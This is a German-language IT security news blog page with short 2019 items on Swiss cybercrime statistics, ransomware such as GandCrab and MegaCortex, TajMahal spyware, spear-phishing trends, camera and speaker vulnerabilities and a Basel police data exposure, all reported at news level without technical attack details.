  1. Elektrischer Warmwasserbereiter
  2. Bayphone
  3. Computermaus
  4. USB-Kabel
  5. Aquariumthermometer
  6. Faxgerät

Mehr Infos gibt’s auf der Website von Stormshield.

10.09.2019 - 14:27 Uhr

Cybercrime steigt in der Schweiz dramatisch an

Im Vergleich zu den vergangenen Jahren ist die Kriminalität in der Schweiz um etwa ein Drittel gesunken. Seit dem Rekordjahr 2012 nahm die Anzahl Opfer von Straftaten um 100'000 ab. Dies geht aus einer Studie der ZHAW hervor.

Die Cyberkriminalität jedoch schwimmt gegen den Strom. Insbesondere Betrugsdelikte wie die unbefugte Datenbeschaffung, das unbefugte Eindringen in Datensysteme oder der betrügerische Missbrauch einer EDV-Anlage nehmen zu.

Cybercrime bevorzugt Italienisch und Französisch

Zwischen 2014 und 2018 nahmen die Fälle von unbefugter Datenbeschaffung um knapp zwei Drittel zu, der Missbrauch von EDV-Anlagen um 27 Prozent. Beide sind jedoch noch deutlich unter dem Vergleichswert von 2012. Das unbefugte Eindringen in Datensysteme nimmt laut der Studie seit 2009 kontinuierlich zu – und zwar um insgesamt 325,8 Prozent.

 

 

 

Ferner gaben 7,7 Prozent der Befragten an, in den vergangenen 12 Monaten Opfer von Cyber-Bullying geworden zu sein. Bei der sexuellen Onlinebelästigung waren es 7 Prozent. 

Cybercrime kommt in der italienischsprachigen Schweiz am häufigsten vor. In der Region berichten 15,6 Prozent der Befragten von derartigen Delikten. In der französischsprachigen Schweiz sind es 14 Prozent und in der Deutschschweiz 10,3 Prozent. Bei der traditionellen Kriminalität gibt es laut der Studie keinen signifikanten Unterschied zwischen den Sprachregionen.

Schweizer wollen härtere Strafen

Obwohl die Kriminalität insgesamt sank, sehen die Befragten dies anders. Lediglich 14,8 gaben an, dass die Straftaten seltener geworden sind. Die deutliche Mehrheit der Bevölkerung schätze die Entwicklung insofern falsch ein, heisst es in der Studie. Beim Cybercrime gingen 95,3 Prozent der Umfrageteilnehmer davon aus, dass diese Straftaten zunehmen. 

Diese Fehleinschätzung führen die Studienautoren vor allem auf zwei Faktoren zurück: den Medienkonsum – insbesondere den Konsum privater Fernsehsender und die politische Orientierung. "Je weiter rechts sich Befragte verorten, umso eher sind sie der Meinung, dass Kriminalität ein Problem ist und umso eher werden höhere Strafen gefordert", sagt Studienautor Dirk Baier. "Mehr als zwei von drei der Befragten befürworten Forderungen nach härteren Strafen."

Zur Methodik

Die ZHAW verschickte nach eigenen Angaben für die Studie über 10'000 Fragebogen an zufällig ausgewählten erwachsenen Personen in der ganzen Schweiz. 2111 hätten geantwortet. Dies entspreche der für derartige Studien durchschnittlichen Rücklaufquote von 20,1 Prozent.
 

10.09.2019 - 15:37 Uhr

Wie Kopfhörer zu Cyberwaffen werden

Matt Wixey, ein Sicherheitsforscher der Beratungsfirma PWC, hat untersucht, wie ein Hacker mit Lautsprechern einen möglichst grossen Schaden anrichten kann. Dass Hacker über Audiogeräte nicht hörbare Töne abspielen können, mit denen sich das Opfer unbemerkt verfolgen lässt, ist schon länger bekannt. Wixey untersuchte stattdessen, wie sich solche Geräte als Waffe missbrauchen lassen, wie "Wired" berichtet

Für seine Experimente nutzte der Sicherheitsforscher verschiedene Geräte, darunter Laptops, Smartphones, Bluetooth-Lautsprecher, Over-Ear-Kopfhörer, aber auch eine an einem Fahrzeug montierte Lautsprecheranlage. Das Ergebnis: Eine kleine Anzahl der Geräte lasse sich überraschend einfach manipulieren.

Ein Hacker könne etwa die Lautstärke so weit erhöhen, dass die Geräte das menschliche Gehör schädigen oder einen Tinnitus verursachen könnten. Der Angriff auf einen Smartspeaker erzeuge zudem eine Menge Hitze. Genug, um die internen Komponenten nach nur wenigen Minuten zum Schmelzen zu bringen. Ferner seien auch psychologische Folgen für die Opfer denkbar.

Solche Attacken könnten gezielt genutzt werden, um Einzelpersonen ausser Gefecht zu setzen. Die gleiche Methode könne jedoch auch etwa auf den Lautsprecheranlagen eines Stadiums angewandt werden. Im Experiment benötigte Wixey physischen Zugriff auf die Geräte. 

04.09.2019 - 14:37 Uhr

Die allsehenden Augen eines Teslas

Die Elektroautos des Herstellers Tesla sehen alles, was in der unmittelbaren Umgebung geschieht. Mit den Daten von – je nach Modell – bis zu acht Kameras und zwölf Ultraschallsensoren kann das Autopilot-Assistenzsystem das Fahrzeug teilweise autonom lenken. Künftige Modelle sollen vollständig autonomes Fahren ermöglichen.

Truman Kain vom US-amerikanischen Beratungsunternehmen Tevora hatte jedoch eine andere Idee: Er entwickelte einen Soft- und Hardware-Stack, um die Elektroautos in mobile Überwachungssysteme zu verwandeln. Das System erkennt Menschen und Fahrzeuge. Wenn eine zuvor identifizierte Person wieder auftaucht, sendet es eine Nachricht auf das Smartphone des Nutzers. So soll dieser erkennen, wenn er verfolgt wird. 

Die Lösung namens Surveillance Detection Scout verwendet einen Nividia Jetson Xavier oder Nano, könne aber auch mit einem Raspberry Pi 4 funktionieren. Gemäss dem Anbieter funktioniert die Lösung mit den Tesla-Modellen 3, S und X. 

Die Version 0.1 ist auf Github verfügbar. Der Hersteller arbeitet nach eigenen Angaben bereits an der nächsten Version. Neben den Installationsanleitungen findet sich auf Github auch eine kleine, aber wichtige Warnung. Je nach Rechtslage könne die Verwendung rechtswidrig sein. Die Lösung sei daher nur für Bildungszwecke gedacht.

Online bietet Tevora ausführlichere Informationen zum Stack an.

26.08.2019 - 14:41 Uhr

Was intelligent ist, ist auch eine Virenschleuder

"Es gibt keine Malware für Apple-Geräte." Eine Aussage, die man noch immer von vielen Nutzern – und auch einigen Fachhändlern! – hören kann. Ein hartnäckiger Irrglaube, wie sich immer wieder zeigt. Im August etwa präsentierte eine Sicherheitsforscherin an der Black-Hat-Konferenz in den USA, wie man mit einer manipulierten iMessage-Nachricht Zugriff auf Bilder, Textnachrichten und weitere Daten des Empfängers erhalten kann. Nur wenige Tage darauf, an der Defcon 2019, stellte ein anderer Sicherheitsforscher ein scheinbar unscheinbares Lightning-Kabel vor. Das Kabel selbst ist jedoch WLAN-fähig und ermöglicht einem Angreifer, Nutzerdaten zu stehlen oder Schadprogramme zu installieren. 

Tatsächlich werden mit der fortschreitenden Digitalisierung immer mehr Produkte zu potenziellen Virenschleudern. Malware ist kein reines Microsoft- und Android-Problem. Das jüngste Beispiel: digitale Spiegelreflexkameras. Sicherheitsforscher des israelischen Cybersecurity-Anbieters Check Point fanden eine Schwachstelle im Picture Transfer Protocol (PTP) – das Protokoll, das den Datenverkehr zwischen Kameras und PCs steuert. Ihnen gelang es, via USB und WLAN auf eine Kamera zuzugreifen und ein Ransomware-Programm zu installieren.

Ein Hacker könnte so die Fotos verschlüsseln und von seinem Opfer ein Lösegeld fürs Entsperren verlangen, wie Check Point schreibt. Für den Versuch verwendeten sie eine EOS 80D von Canon. Allerdings verwenden alle gängigen Kamerahersteller den PTP-Standard. "Jedes 'intelligente' Gerät, einschliesslich einer digitalen Spiegelreflex-Kamera, ist anfällig für Angriffe aus dem Internet", sagt Eyal Itkin, Sicherheitsforscher bei Check Point. 

Wie Canon mitteilt, gebe es noch keine Bestätigten Fälle, in denen Angreifer die Schwachstelle wirklich ausnutzten. Dennoch publizierte der Hersteller online bereits einen Workaround: Nutzer sollten ihre Kameras nicht an PCs in einem ungesicherten Netzwerk oder an einen PC, der potenziell mit Malware infiziert ist, anschliessen. Zudem sollten sie die WLAN-Funktion ihrer Kamera bei Nichtverwendung immer abschalten und bei einem Update darauf achten, die offizielle Firmware herunterzuladen.

Mehr Information von Canon gibt es hier. Der ausführliche Bericht von Check Point ist hier zu finden.

22.08.2019 - 12:18 Uhr

Unternehmen stecken mehr Geld in IT-Security – aber nicht primär in neue Technologien

Unternehmen weltweit wollen nächstes Jahr mehr in Cybersecurity investieren. Dies zeigt eine Studie des Beratungsunternehmens PWC. Demnach wollen 2020 etwa 69 Prozent der befragten Unternehmen 5 Prozent oder mehr ihres gesamten IT-Budgets für Cybersecurity ausgeben. Im Vorjahr lag dieser Wert noch bei 56 Prozent, wie PWC mitteilt.

Fast ein Drittel der Unternehmen wolle sogar mehr als 10 Prozent des Budgets in den eigenen Cyberschutz investieren. Gegenüber dem Vorjahr sei dieser Wert um 11 Prozentpunkte auf 30 Prozent gestiegen. 

 

 

 

"Die geplanten Budgeterhöhungen unterstreichen die betriebswirtschaftliche Relevanz der IT-Sicherheit", sagt Jörg Asma, Cyber Security Leader bei PwC Deutschland. "Waren Investitionen in Cybersicherheits-Kapazitäten und -personal vor einigen Jahren noch ein eher notwendiges Übel, sind sie heute strategischer Imperativ."

Es braucht qualitative Verbesserungen

Das Geld soll aber nicht einfach in Technologie gesteckt werden. So halten es nur 4 Prozent der Befragten für sehr wichtig, die technologische Aufklärung sowie den Fokus auf die operative technologische Sicherheit zu verbessern. Knapp die Hälfte hält aber die Einführung von künstlicher Intelligenz und Automatisierung für die wichtigste Veränderung, auf die sich Cybersecurity-Teams einstellen müssen. 

Statt technologischen brauche es vor allem qualitative Veränderungen. 76 Prozent der Befragten halten etwa signifikante Anpassungen in den Cybersecurity-Teams für notwendig. 72 Prozent der Unternehmen sagen, dass Cybersecurity-Spezialisten stärker in die Strategie und die geschäftlichen Prozesse eingebunden werden sollen. 64 Prozent gaben an, dass sie mehr Kompetenzen brauchen, um ihre Zulieferer und Partner auf Risiken zu prüfen.

 

Welche konkreten Veränderungsnotwendigkeiten sehen Sie in Bezug auf Cyber-Sicherheitsteams?

Welche konkreten Veränderungsnotwendigkeiten die befragten Unternehmen in Bezug auf Cybersecurity-Teams sehen. (Source: PWC)

"Unternehmen haben erkannt, dass in vielen Cyberteams deutlicher Lernbedarf hinsichtlich Management- und Kommunikationsfähigkeiten besteht", sagt Asma. "Auf der anderen Seite lässt sich aber eine enorme technologische Entwicklung auf Seiten der Angreifer beobachten, auf die ein Sicherheitsteam auch heute schon kurzfristig adäquat reagieren muss. Ein technologisches 'am Ball bleiben' ist damit nicht nur wichtig, sondern überlebensnotwendig."
 

17.07.2019 - 15:33 Uhr

Nach eineinhalb Jahren Arbeit: Ransomware-Entwickler geniessen Ruhestand

Eineinhalb Jahre, nachdem Gandcrab auf die Welt losgelassen wurde, geht die Ransomware nun in den Ruhestand. Dies verkündeten die Entwickler des Erpresserprogramms im Hackerforum Exploit.in, wie Bleepingcomputer berichtet

Die Entwickler stellten die Vermarktung ein, beantragten die Löschung all ihrer Posts in dem Forum und bedankten sich dabei noch bei einem Forum-Admin. Sie forderten ihre Partner auf, Gandcrab nicht länger zu verbreiten und die Opfer, zu zahlen, weil sie die Decryption Keys Ende Monat löschen werden. Das FBI veröffentlichte unterdessen die Master Decryption Keys für die Gandcrab-Ransomware.

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

Obwohl diese Malware vergleichsweise kurz aktiv war, erbeutete sie gemäss den Entwicklern über 2 Milliarden US-Dollar an Lösegeldern. Die Entwickler selbst wollen über 150 Millionen Dollar eingesackt haben. Das Geld hätten die Cyberkriminellen nun in legale Unternehmen investiert. Bleepingcomputer hält dies jedoch für Prahlerei. Gandcrab gehört dennoch zu den auffälligeren Ransomware-Programmen. 

Die Entwickler verhöhnten und köderten etwa im Source Code wiederholt Sicherheitsforscher und IT-Security-FirmenGemäss Bleepingcomputer ein Zeichen dafür, dass die Entwickler ein genauso waches Auge auf die IT-Security-Branche wie diese auf die Entwickler geworfen hatten. Dabei zeigten sie auch rachsüchtige Züge: Als Ahnlab im Juli 2018 ein Abwehr-Tool gegen Gandcrab veröffentlichte, konterten die Entwickler, indem sie eine Zero-Day-Lücke in der Software der Firma ausnutzten – oder gaben dies zumindest vor. 

Die Lücke, die Gandcrab hinterlässt, wird vermutlich bald wieder gefüllt werden. Vor allem, weil die Ransomware gerade gezeigt hat, dass sich das Geschäft mit Erpresserschadprogrammen lohnt. Oder mit den Worten der Gandcrab-Entwickler: "We have proven that by doing evil deeds, retribution does not come."

17.07.2019 - 15:29 Uhr

Cyberkriminelle attackieren gamende Internetpiraten

Die Videospielbranche gehört zu den grössten Industrien überhaupt. 2018 erwirtschaftete das Spiel mit Spielen gemäss dem Marktforscher Newzoo einen Umsatz von knapp 135 Milliarden US-Dollar – über 13 Prozent mehr als im Vorjahr. Für Cyberkriminelle bedeutet dies in erster Linie eines: lukrative Ziele. 

Die Cyberkriminellen haben es jedoch nicht auf die Gamer abgesehen, die diesen Umsatz generiert haben, wie eine Studie von Kaspersky zeigt. Stattdessen gaukeln die Kriminellen ihren Opfern vor, sie könnten eine Kopie eines noch nicht veröffentlichten Spiels herunterladen, etwa "The Elder Scrolls 6", "Borderlands 3" oder "Fifa 20". Wer nicht bis zum offiziellen Release warten kann, erlebt sogleich eine böse Überraschung: Statt des neuen Games hat man sich Malware auf den Rechner geladen. 

Das populärste Spiel, um Malware zu verbreiten, ist gemäss der Studie "Minecraft". Das Open-World-Spiel wurde für fast ein Drittel aller Attacken ausgenutzt. Zwischen Juni 2018 und Juni 2019 luden 310 000 Opfer Malware statt "Minecraft" herunter. Darauf folgten "GTA 5" mit 112 000 Opfern und "Sims 4" mit knapp 105'000. Insgesamt zählte Kaspersky 932'464 Opfer.

Kaspersky empfiehlt daher auch lakonisch: Nutzt nur legitime Services, die sich bewährt haben.  

17.07.2019 - 15:25 Uhr

Falsch konfiguriert – Leck im Container

Dank Docker und Kubernetes sind Container in der IT nun in aller Munde. Wer automatisieren will, containerisiert. Über diese Container-Goldgräberstimmung hängen jedoch auch dunkle Wolken, wie einem Bericht von Palo Alto Networks zu entnehmen ist. 

Scheinbar einfache Fehlkonfigurationen könnten schwerwiegende Folgen haben, schreibt das Unternehmen. So könnten die Nutzung von Standard-Container-Namen und das Zurücklassen von Standard-Service-Ports die Umgebungen anfällig machen. Unbekannte Dritte könnten in das System eindringen und es auskundschaften. 

In dem Bericht sammelte das Unternehmen daher verschiedene Tipps, wie Unternehmen ihre Container absichern können. So könnten die richtigen Netzwerklinien und Firewalls verhindern, dass interne Ressourcen über das Internet öffentlich zugänglich werden. 

Zudem sollten Unternehmen Dienste stets in ihren eigenen Containern isolieren und nicht mehrere Dienste in einem Container unterbringen. Dies erhöhe die Ressourceneffizienz des Containers selbst und trage zudem zur Umsetzung effektiver Sicherheitsrichtlinien bei. 

Den vollständigen Bericht könnten Interessierte online lesen.

21.05.2019 - 13:31 Uhr

Happy Birthday Wannacry! Aber fast 2 Millionen haben nichts dazugelernt

Im Mai 2017 hat die Welt ein Wort gelernt, das zuvor nur IT-Security-Experten kannten: Ransomware. Die Erpressersoftware Wannacry trat ihren Siegesmarsch an und legte allein in der ersten Welle rund 200'000 IT-Systeme weltweit lahm. Es sollten noch viel mehr folgen.

Was besonders wehtut: Das Schadprogramm nutzte eine Schwachstelle aus, die Microsoft bereits im März 2017 geschlossen hatte. Zwei Monate vor dem Wannacry-Zwischenfall. Die dramatische Verbreitung der Ransomware zeigte also vor allem eines: Unternehmen patchen ihre Systeme nicht – auch nicht die kritische Infrastruktur. 

Konkret geht es um die Sicherheitslücke MS17-101 im SMB-Protokoll. SMB steht für Server Message Block und ist ein Netzprotokoll für Datei-, Druck- und andere Serverdienste. Ein Angreifer könne dank der Schwachstelle etwa Applikationen auf einem fremden Rechner ausführen oder Dateien bearbeiten. Dieser Exploit wird als EternalBlue bezeichnet. 

Und wie sieht die Situation zwei Jahre später aus? Zum Heulen! 

 

 

1,7 Millionen Rechner seien noch immer angreifbar auf diesem Weg, wie Nate Warfield, Senior Security Program Manager bei Microsoft, auf Twitter mitteilt. Auch wenn die Anzahl im Vergleich zum Vorjahr deutlich gesunken ist. Für eine seit über 2 Jahren gepatchte Schwachstelle ist die Zahl sehr hoch.

21.05.2019 - 13:24 Uhr

Hilfreiche Matrix-Fans infizieren Rechner

Der britische Sicherheitsanbieter Sophos hat ein paar hilfreiche Matrix-Fans gefunden. Diese wollen Unternehmen mit nützlichen Tipps helfen, ihre Cybersecurity aufzubessern. Die Sache hat nur einen Haken: Das Angebot unterbreiten die Matrix-Fans in der Lösegeldforderung ihrer Ransomware. 

Sophos hat die Ransomware namens "MegaCortex" seit Anfang Mai auf dem Radar, wie das Unternehmen mitteilt. Anfangs unscheinbar stieg die Anzahl geblockter Infektionen plötzlich explosionsartig an. Wie Sophos schreibt, gleicht die Erpresser-Malware der Ransomware "SamSam". Zudem sollen die Malware-Familien Emotet und Qbot bei der Verbreitung von "MegaCortex" helfen. 

 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

 

Der Name der Malware ist gemäss den Sicherheitsforschern eine Hommage an die Filmreihe "The Matrix" – wenn auch falsch geschrieben. Neo, in den Filmen durch Keanu Reeves gespielt, arbeitet zu Beginn der ersten Episode in einer Firma mit einem sehr ähnlich klingenden Namen: "MetaCortex". 

Auch die Lösegeldforderung scheine in der Stimme und Kadenz von Laurence Fishburne’s Filmfigur Morpheus geschrieben. Nachdem die Erpresser ihre Opfer zum Zahlen aufgefordert und Tipps für eine bessere IT-Sicherheit angeboten haben, endet das Schreiben der Cyberkriminellen auch mit einem leicht abgewandelten Zitat von Morpheus: "We can only show you the door. You’re the one who has to walk through it." 

 

21.05.2019 - 13:18 Uhr

Kaspersky stellt die wirklich wichtigen Fragen

Wer kennt die Situation schon nicht: Man steht vor dem offenen Kühlschrank, findet die Brokkoli hinter der Milch nicht mehr und fragt sich: Habe ich eigentlich meinen Desktop im Büro genauso ordentlich aufgeräumt? 

Der russische Sicherheitsanbieter Kaspersky Lab sieht hier nämlich einen Zusammenhang und ging dieser Frage in einer Studie nach. Das Ergebnis: Es gibt einen direkten Zusammenhang zwischen menschlichen Gewohnheiten – wie etwa das Aufräumen des Kühlschranks – und dem Umgang mit beruflichen Daten und Dokumenten. Oder anders gesagt: Wer irgendwo nicht aufräumt, räumt wohl nirgends wirklich auf. 

Gemäss der in Deutschland durchgeführten Studie schätzten 16 Prozent der befragten Büroangestellten den Inhalt ihres Kühlschranks als «wenig bis überhaupt nicht strukturiert und organisiert» ein. Dieselbe Einschätzung hatten sie auch für ihren Umgang mit gespeicherten Geschäftsdaten. 

Kaspersky sieht darin ein grosses Problem. "Da das Datenvolumen exponentiell zunimmt, sollten Geschäftsverantwortliche verstärkt auf Ordnerwüsten und das dadurch entstehende potenzielle Sicherheitsrisiko achten", sagt Maxim Frolov, Vice President of Global Sales bei Kaspersky Lab.

Fehlt der Überblick über das Datenchaos, fehlt auch die nötige Kontrolle. Wer darf jetzt auf welche Daten zugreifen? Ist dies nicht sauber und ordentlich geregelt, könnten unbefugte Drittpersonen darauf zugreifen. Je nachdem wer darauf zugreift, könnte dies finanzielle Folgen oder einen Reputationsverlust zur Folge haben.

21.05.2019 - 13:13 Uhr

E-Zigis verpetzen Nutzer

Ob E-Zigaretten gesünder sind als herkömmliche Tabakwaren, wird noch debattiert. Was jedoch ausser Diskussion steht, ist, dass E-Zigis ein völlig neues Problem für den Nutzer kreieren: ein Datenschutzproblem. 

Wie die Handelszeitung berichtet, senden die Iqos-Produkte von Philip Morris International Daten zum Nutzungsverhalten an einen Server im Norden von Zürich. Der Tabakkonzern hat eine operative Zentrale mit Forschungssitz in der Schweiz. 

Die kanadische Firma Techinsights habe die Geräte auf ihre Einzelteile hin geprüft. Dabei entdeckte sie einen übermittlungsfähigen Speicherchip. Das Gerät sammle Daten zu Batterieverbrauch und Anzahl Züge an der E-Zigarette. Per Bluetooth sei es in Tandem mit einem Smartphone auch möglich, den Standort des Qualmers herauszufinden. 

E-Zigaretten könnten auch zur Verbreitung von Malware genutzt werden. Wie, können Sie an dieser Stelle nachlesen.

Alles im Sinne der Markt- und Zielgruppenforschung für eine bessere After-Sales-Unterstützung der Nutzer, beteuert der Hersteller. Der Konzern halte sich zwar an die Datenschutzbestimmungen der EU. Aber wenn eine E-Zigarette Daten sammelt, so sind dies Gesundheitsdaten. Und diese geniessen einen besonderen Schutz. 

Der Bundesrat soll sich nun in der Sommersession der Sache annehmen. Derweil arbeiten die Konkurrenten von Philipp Morris fleissig daran, ebenfalls speicher- und übertragungsfähige E-Zigis zu lancieren.

23.04.2019 - 11:47 Uhr

Warum Cybersecurity etwas mehr Chamäleon statt Nashorn sein sollte 

Cybercrime verursacht jährlich Schäden in Milliardenhöhe. Und jedes Jahr wird die Summe sogar noch grösser. IT-Security-Firmen versuchen mit Bollwerken dagegen vorzugehen: Je schwieriger ein System zu hacken ist, desto wahrscheinlicher wird es, dass sich die Hacker ein anderes Ziel aussuchen, schreibt BBC News. Vergleichbar mit dem Nashorn, das sich dick gepanzert vor wenig fürchten muss. 

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Ein Beitrag geteilt von IT Security Blog (@itsecurityblog) am

Einige Sicherheitsexperten wollen die Branche nun aber in eine andere Richtung lenken: weniger Nashorn und mehr Chamäleon. Rechner sollen sich tarnen, um Attacken zu entgehen. “Wir müssen Prevention wieder ins Spiel bringen”, zitiert der Bericht Yuval Danieli, Vice President of Customer Services beim israelischen IT-Security-Anbieter Morphisec. Ihre Strategie basiert auf Forschungsarbeiten der renommierten Ben-Gurion-Universität des Negev.

Das Unternehmen spricht in diesem Zusammenhang von “Moving Target Security”. Dabei werden die Namen, Dateiverzeichnisse und Referenzen jeder Datei und Applikation im Speicher des Computers chiffriert. Bei jedem Neustart aufs Neue. So ändert sich die Konfiguration des PCs bei jeder Verwendung. Dies mache es für Malware schwierig, sich in das System zu verbeissen. 

Morphisecs Technologie wird gemäss dem Bericht derzeit unter anderem von der London Stock Exchange genutzt.

 

23.04.2019 - 11:39 Uhr

Fast ein Viertel aller Spear-Phishing-Attacken imitieren Microsoft 

Der kalifornische Spezialist für Netzwerksicherheit Barracuda hat eine Studie zum Thema Spear-Phishing veröffentlicht. Spear-Phishing-Attacken sind hochgradig spezialisierte und auf das Opfer zugeschnittene Phishing-Kampagnen. Die Angreifer versuchen auf diese Weise etwa an die Zugangsdaten oder Zahlungsinformationen ihrer Opfer zu kommen. 

Um ihre Opfer zu täuschen, würden die Angreifer in 83 Prozent der Fälle bekannte Unternehmen und häufig genutzte Businessapplikationen imitieren. Fast ein Drittel dieser Imitationen kopieren den Markenauftritt von Microsoft – also rund ein Viertel der totalen Anzahl an Phishing-Attacken. 21 Prozent der Imitationsattacken versuchen, das Opfer mit Apple-Logos zu täuschen. Ferner entdeckte Barracuda auch Spear-Phishing-Mails, die vorgaben, von Docusign, Amazon oder Linkedin zu kommen.

In einem Fünftel der Fälle werden laut der Studie Finanzinstitute imitiert – darunter etwa American Express oder die Bank of America. Zudem stünden Mitarbeiter von Finanzabteilungen besonders im Visier von Spear-Phishing-Angriffen. Denn diese Mitarbeiter kommunizieren am häufigsten mit Finanzinstituten. 

Wenn keine Marke ausgenutzt wird, versuchen es die Angreifer mit Sextortion oder Business E-Mail-Compromise (BEC). Laut Barracuda gaukeln 10 Prozent aller untersuchten E-Mails dem Opfer vor, der Angreifer sei im Besitz von kompromittierendem Videomaterial. 

Bei BEC-Attacken versuchen die Angreifer das Opfer glauben zu lassen, dass die E-Mail von einem Mitarbeiter kommt. Dies funktioniere besonders auf mobilen Geräten gut, da oft nur der gefälschte Absendername und nicht mehr die volle E-Mail-Adresse angezeigt wird. 

Für die Studie untersuchte Barracuda 360'000 Spear-Phishing-E-Mails in einem Zeitraum von drei Monaten.

23.04.2019 - 11:36 Uhr

Raffinierte Spionageplattform “TajMahal” bespitzelte jahrelang unentdeckt 

Kaspersky Lab hat eine bedrohliche Entdeckung gemacht: eine Spionageplattform, die während mindestens fünf Jahren aktiv war und in der Zeit auch weiterentwickelt wurde. Wer dahintersteckt und wie das Schadprogramm auf den Rechner kam, fand Kaspersky nicht heraus. Aber der Drahtzieher scheint mit keinem bekannten Bedrohungsakteur in Verbindung zu stehen. 

Kaspersky nennt die Spionageplattform “TajMahal”. Der Name leite sich von der Benennung einer Datei ab, mit der Daten herausgefiltert wurden. Die Plattform umfasse rund 80 schädliche Module, darunter Loader, Orchestratoren, C&C-Kommunikatoren, Audiorekorder, Keylogger, Bildschirme, Webcam-Grabber sowie weitere Spionagesoftware.

“Die technische Raffinesse steht ausser Zweifel und das Schadprogramm bietet Funktionen, die wir bei fortgeschrittenen Bedrohungsakteuren bisher nicht gesehen haben”, sagt Alexey Shulmin, leitender Malware-Analyst bei Kaspersky Lab. Das Schadprogramm ist etwa in der Lage, die Dokumente in der Drucker-Warteschlange zu stehlen. Wenn ein USB-Stick angeschlossen ist, kann “TajMahal” auch auslesen, welche Dateien zuvor auf diesem USB-Stick angesehen wurden. 

Bislang fand Kaspersky nur ein einziges Opfer: eine zentralasiatische Botschaft. Doch gemäss Shulmin ist es höchst unwahrscheinlich, dass eine so grosse Investition nur für ein einziges Opfer getätigt wurde. “Dies deutet darauf hin, dass es entweder noch weitere, bisher unbekannte Opfer oder weitere Versionen dieser Malware gibt – oder möglicherweise beides.”

Eine ausführlichere Beschreibung von TajMahal bietet Kaspersky Lab online.

 

25.03.2019 - 13:58 Uhr

Kantonspolizei Basel-Stadt veröffentlicht Verkehrssünder im Netz

Im Herbst 2017 hat die Kantonspolizei Basel-Stadt begonnen, Bussen mittels App und QR zu verteilen. Wer den Code mit dem Smartphone einscannt, kommt direkt zum Online-Bussenschalter. Dort findet er jedoch unter Umständen mehr als nur seine Verkehrssünden, wie die BZ Basel berichtet

Die Namen und Adressen sowie die Art und der Zeitpunkt des Vergehens von tausenden Personen waren gemäss dem Bericht jahrelang frei zugänglich und online einzusehen – bis die BZ Basel bei der Kantonspolizei Basel-Stadt nachfragte. Danach seien sie nicht mehr auffindbar gewesen.

Das Problem war jedoch nicht eine Sicherheitslücke – es wurde online schlicht keine Sicherheitsfunktion zwischengeschaltet. "Bei der Einführung des Online-Bussenschalters haben die involvierten kantonalen Stellen eine Güterabwägung vorgenommen zwischen der Art von Daten und dem Schutzmechanismus auf der einen und der Benutzerfreundlichkeit auf der anderen Seite", zitiert der Bericht den Polizeisprecher Martin Schütz.

Die online einsehbaren Daten seien auch nicht mehr, als man auch bisher mit grossem Aufwand hätte recherchieren können. "Nämlich indem man einer Strasse entlanggeht und sich die Art der Busse sowie die Autonummer notiert und danach Halterabfragen tätigt." 

"Ursprünglich hatten wir bei der Bussen-Abfrage eine zusätzliche Sicherheitsstufe eingebaut, nämlich die Autonummer", sagt Bernhard Frey Jäggi, Leiter Abteilung Verkehr, gegenüber BZ Basel. "Als wir aber auch Fussgängern und Velofahrern die Möglichkeit bieten wollten, ihre Ordnungsbussen online zu bezahlen, wurde die Autonummer weggelassen."

Vergehen mit heikleren Daten, wie etwa Fahren in angetrunkenem Zustand oder Raser-Delikte, seien nicht online publiziert gewesen. Für die Umsetzung des Online-Bussenschalters beziehungsweise der App waren die Zentralen Informatikdienste (ZID) und Abraxas verantwortlich. 

25.03.2019 - 13:52 Uhr

Welches ist das sicherste OS auf der Welt? Windows Vista, natürlich!

Avast hat sich in seinem jährlichen Global PC Risk Report mit dem Gefahrenpotenzial für Privatcomputer auseinandergesetzt. Der tschechische Anbieter von IT-Security-Software kommt darin zum Schluss, dass für Anwender von Windows 7, 8 und 10 ein Risiko von 20 Prozent besteht, dass sie Opfer eines Cyberangriffs werden. Dieses Risiko entstehe dadurch, dass die PCs unzureichend geschützt seien. 

"Die sicherste Windows-Version ist laut dem Report Windows Vista", heisst es in der Mitteilung zum Report. Wohl eine unglückliche Wortwahl. Schliesslich stellte Microsoft auch den erweiterten Support für Windows Vista am 11. April 2017 ein! Das Unternehmen warnte davor, das OS nach Supportende weiterhin zu nutzen, da Vista-Computer ohne weitere Updates die Sicherheit des Nutzers gefährden würden. 

Das geringe Infektionsrisiko bei Vista-Computer, wie auch Avast selbst im Report festhält, liege wohl eher an der geringen globalen Nutzung des Betriebssystems. Bereits Anfang 2017 machte Vista nicht mal 1 Prozent aller Windows-PCs aus, wie Marktforscher Netmarketshare damals mitteilte. Ein Jahr später war der Anteil noch weiter geschrumpft, so dass das OS gar nicht mehr in den Übersichten des Marktforschers auftauchte. Die geringe Nutzerzahl mache Vista für Cyberkriminelle wohl zu einem unattraktiven Ziel, mutmasst Avast. Dennoch: Ein Mangel an Bedrohungen macht ein wehrloses Betriebssystem nicht sicher.

In der Schweiz ist dieses Risiko für PCs übrigens etwas geringer: 14,2 Prozent gemäss Report. Den vollständigen Report können Sie online an dieser Stelle lesen (PDF-Download).

25.03.2019 - 13:48 Uhr

Hardware-Sicherheitslücke: EPFL und IBM finden Spectre-Nachfolger

Die Sicherheitslücken Spectre und Meltdown sorgten vergangenes Jahr für viel Aufsehen. Die Lücken zeigten, dass Security auch eine Frage der Hardware ist und stark von der Computerarchitektur abhängt. Welche Folgen Meltdown und Spectre für das Design zukünftiger Architekturen haben, können Sie hier nachlesen

Nun haben die ETH Lausanne (EPFL) und IBM neue jedoch mit Spectre und Meltdown vergleichbare Schwachstellen entdeckt. Sie tauften diese "SmotherSpectre", wie die EPFL mitteilt. Dabei handle es sich um eine "spekulative Seitenkanalattacke". Ein Angreifer könne ein CPU-Optimierungsverfahren ausnutzen, um Daten abzuzapfen. 

Heutige CPUs verarbeiten viele Befehle zugleich, schreibt die EPFL. Statt zu warten, bis alle Verzweigungsbefehle abgeschlossen sind, spekuliert das Optimierungsverfahren, was die nächsten Befehle sein könnten und beginnt diese bereits auszuführen. Liegt die CPU richtig, kann sie so Aufgaben schneller lösen.

Sollte die CPU sich jedoch irren, werden die spekulativen Befehle zwar verworfen. Sie kreieren allerdings auch einen so genannten Seitenkanal, durch den ein Angreifer Daten stehlen kann. Spectre und Meltdown funktionierten auf vergleichbare Weise.

